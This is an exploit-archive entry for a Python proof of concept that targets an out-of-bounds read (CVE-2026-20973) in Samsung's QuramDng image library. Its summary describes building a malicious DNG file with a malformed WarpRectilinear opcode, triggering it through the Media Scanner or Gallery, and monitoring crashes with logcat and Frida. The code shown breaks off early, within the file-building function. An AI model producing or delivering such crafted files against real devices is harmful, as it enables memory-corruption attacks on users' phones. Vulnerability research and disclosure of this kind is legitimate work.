============================================================================================================================================= | # Title : Samsung QuramDng Warp OOB Read PoC | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.samsung.com/n_africa/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/215033/ & CVE-2026-20973 [+] Summary : This Python proof of concept demonstrates an out-of-bounds (OOB) read vulnerability in Samsung’s QuramDng image processing library, triggered via a specially crafted DNG (Digital Negative) file. The script programmatically builds a minimal but valid DNG file containing a malformed WarpRectilinear opcode, designed to provoke unsafe memory access when processed by Samsung components such as Media Scanner (ipservice) or the Gallery app. [+] The PoC includes: Automatic creation of the malicious DNG file. Multiple trigger methods (Media Scanner or Gallery). Logcat-based crash monitoring to detect SIGSEGV or QuramDng-related faults. Optional generation of a Frida JavaScript monitoring script to observe Warp-related function calls at runtime. [+]PoC : python poc.py #!/usr/bin/env python3 import struct import os import subprocess import sys import time def create_dng_file(filename="exploit.dng", width=3, height=3): """ """ print(f"[+] Creating DNG {width}x{height}") data = bytearray() data.extend(b'II') data.extend(struct.pack('